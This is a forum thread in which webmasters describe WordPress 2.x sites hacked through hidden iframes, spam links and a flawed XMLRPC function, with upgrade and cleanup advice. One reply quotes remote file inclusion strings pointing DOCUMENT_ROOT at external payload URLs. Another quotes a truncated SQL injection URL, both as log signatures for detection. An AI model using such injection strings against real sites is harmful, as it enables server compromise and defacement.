Get exclusive CAP network offers from top brands

View CAP Offers

WordPress Hack – Warning

asked 4 years ago
Hey guys

I noticed in Google one of my undernourished WordPress sites had the message “This site may harm your computer” under its listing. On checking I found it had been hacked and a hidden “iframe” had been included on two posts which ran out through a Chinese server and called a script called “wp-stats”. Turns out this is a hack done through a dodgy XMLRPC function in WordPress 2.2 and may also affect WordPress 2.5.

I upgraded to 2.6 which fixes the loophole, but you still need to remove the offending code by editing each affected post. If you don’t wan to upgrade, you can also disable the attack it by removing the offending code from whatever posts its in, stopping people commenting on posts and removing any users that have been registerd (apart from your own) in admin.

Worth checking if you run WordPress.

If you have the “harm” message in Google, you need to use Webmaster Tools to ask for the site to be reviewed again after you have tidied up the posts.

Cheers

Simmo!

3 Answers
sipka answered 4 years ago
This is a new hacking attempt, a PHP injection kinda hack. And unfortunately not just for WP users. Non-wp users can be injected if their server allows a non-local call for php files and their code allows executables.

It is advised to keep your CMS up-to-date all the time, but the first place I would see around in your vhost config, and make sure the register globals php flag is turned off. So noone can execute anything nasty just by injecting your php files with executable SERVER[DOCUMENT_ROOT] commands.

Check your webstats and look for rows like this in the pages your visitors seen list:
DOCUMENT_ROOT=http://​artemcity.​ru/​r0x.​txt?​?
?​_SERVER[DOCUMENT_ROOT]=http://​http://www.​topyn.​com/​ips.​txt?

An injection attempt will look something like those above.

kwblue answered 4 years ago
another WP hack is running around out there as well.. I’m not sure if it starts off the same way, but all my WP blog sites are getting tagged several times a day with the following code:

xxxhttp://www.{blogsitename}.com/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44454…

It is a very long URL, but the purpose is to do something to WP. I’ve read up a bit and know it’s a hacking attempt, but I think it only works on older versions of WP. I tried it on my sites and nothing happened at all. I upgraded them to the latest version of WP anyway.

So – UPGRADE YOUR WORDPRESS BLOGS NOW!

Big Fish answered 4 years ago
I had a few wordpress blogs that were hacked into (WP 2.5) and the hackers inserted hundreds of hidden spam links on my blog. Needless to say my sites lost their rankings in the serps. It pisses me off when people pull dirty tricks like that. Its also scary that wordpress, being the successful and established blog software they are, is hackable like this. :banger: